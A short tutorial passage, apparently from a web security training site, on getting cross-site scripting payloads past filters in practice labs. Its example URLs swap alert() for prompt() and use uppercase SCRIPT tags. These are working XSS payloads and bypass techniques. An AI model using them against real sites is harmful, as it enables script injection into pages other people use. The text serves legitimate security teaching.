Alert
My friends, everyone and their grandmother knows about alert. Please stop using it from now on. Almost all of my labs filter it and so does almost anything in the wild.
For example, this will not work
https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dalert()>
But this will
https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dprompt()>
confirm
The same goes for filtering of confirm(), you can always use other ways of bypassing filters.
lowercase filtering
https://hackxpert.com/labs/RXSS/GET/10.php?fname=<script>alert()<%2Fscript>
If we look at this example, lowercase “script” appears to be blocked. But what if we try “SCRIPT”?
https://hackxpert.com/labs/RXSS/GET/10.php?fname=<SCRIPT>alert()<%2FSCRIPT>